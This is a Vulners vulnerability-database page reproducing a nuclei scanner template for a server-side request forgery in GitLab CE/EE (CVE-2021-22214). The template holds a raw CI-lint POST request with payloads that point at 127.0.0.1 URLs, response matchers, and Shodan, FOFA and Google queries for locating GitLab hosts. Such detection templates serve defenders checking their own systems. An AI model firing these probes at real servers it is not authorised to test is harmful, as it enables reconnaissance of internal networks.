Lucene search
K

Gitlab CE/EE 10.5 - Server-Side Request Forgery

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 50 Views

GitLab CE/EE 10.5 - Server-Side Request Forgery vulnerabilit

Related
Refs
Code
id: CVE-2021-22214

info:
  name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
  author: Suman_Kar,GitLab Red Team
  severity: high
  description: |
    GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
    - CVE-2021-39935
    - CVE-2021-22214
    - CVE-2021-22175
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.
  remediation: |
    Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22214
    - https://nvd.nist.gov/vuln/detail/CVE-2021-39935
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22175
    - https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
    - https://docs.gitlab.com/ee/api/lint.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2021-22214
    cwe-id: CWE-918
    epss-score: 0.27806
    epss-percentile: 0.97853
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query:
      - http.title:"GitLab"
      - cpe:"cpe:2.3:a:gitlab:gitlab"
      - http.title:"gitlab"
    fofa-query: title="gitlab"
    google-query: intitle:"gitlab"
  tags: cve2021,cve,gitlab,ssrf,vkev,vuln

http:
  - raw:
      - |
        POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {{body}}

    payloads:
      body:
        - '{"content":"include:\n  remote: http://127.0.0.1/test.yml"}'
        - '{"content": "include:\n  remote: http://127.0.0.1:9100/test.yml"}'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'does not have valid YAML syntax!'

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207571043cdfa8a410bdc851f170f849b19526fc644c222d50d9062112dc09ccfa022100f41f569a926e5ccd25b0b2a2a9bda10503c90757fd43c5f51d11a7c718b6500f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.8
CVSS 3.16.8 - 9.8
EPSS0.53372
SSVC
50